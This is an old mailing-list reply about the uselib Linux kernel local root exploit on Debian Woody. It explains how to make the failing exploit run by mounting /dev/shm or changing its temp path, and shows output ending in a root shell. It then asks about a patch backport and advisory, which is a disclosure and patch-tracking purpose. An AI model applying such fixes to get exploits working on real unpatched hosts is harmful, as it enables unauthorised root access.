Re: local root exploit
On Fri, 07 Jan 2005 23:55:15 +0100, Arnaud Loonstra <arnaud@sphaero.org>
wrote:
> Just tried the newly found exploits on a Woody system, it doesn't work...
> I get:
> [+] SLAB cleanup
> child 1 VMAs 143
> [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
> [+] vmalloc area 0xc5000000 - 0xc9d17000
> [-] FAILED: open lib (/dev/shm/_elf_lib not writable?) (No such file or
> directory)
> Killed
>
> http://isec.pl/vulnerabilities/isec-0021-uselib.txt
>
> Any other findings?
>
> A. Loonstra
Hello,
I have tried the exploit and it works! It just needs the /dev/shm
filesystem to be mounted, or you can modify the exploit to put the temporary file into /tmp/
instead of /dev/shm/:
mount -t tmpfs tmpfs /dev/shm
After that:
$ ./elflbl
[+] SLAB cleanup
child 1 VMAs 65527
child 2 VMAs 9756
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc4400000 - 0xc8401000
Wait... /
[+] race won maps=10368
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc48da000
[+] gate modified ( 0xffec90f4 0x0804ec00 )
[+] exploited, uid=0
sh-2.05a# whoami
root
sh-2.05a#
kernels tested:
kernel-image-2.4.18-1-586tsc 2.4.18-13.1
kernel-image-2.4.18-bf2.4 (left from installation)
compiled with:
gcc-2.95 2.95.4-11woody1
So, now the question is whether backporting the patch is on the way and when we can
expect a DSA.
--
Best regards
Vladislav Kurz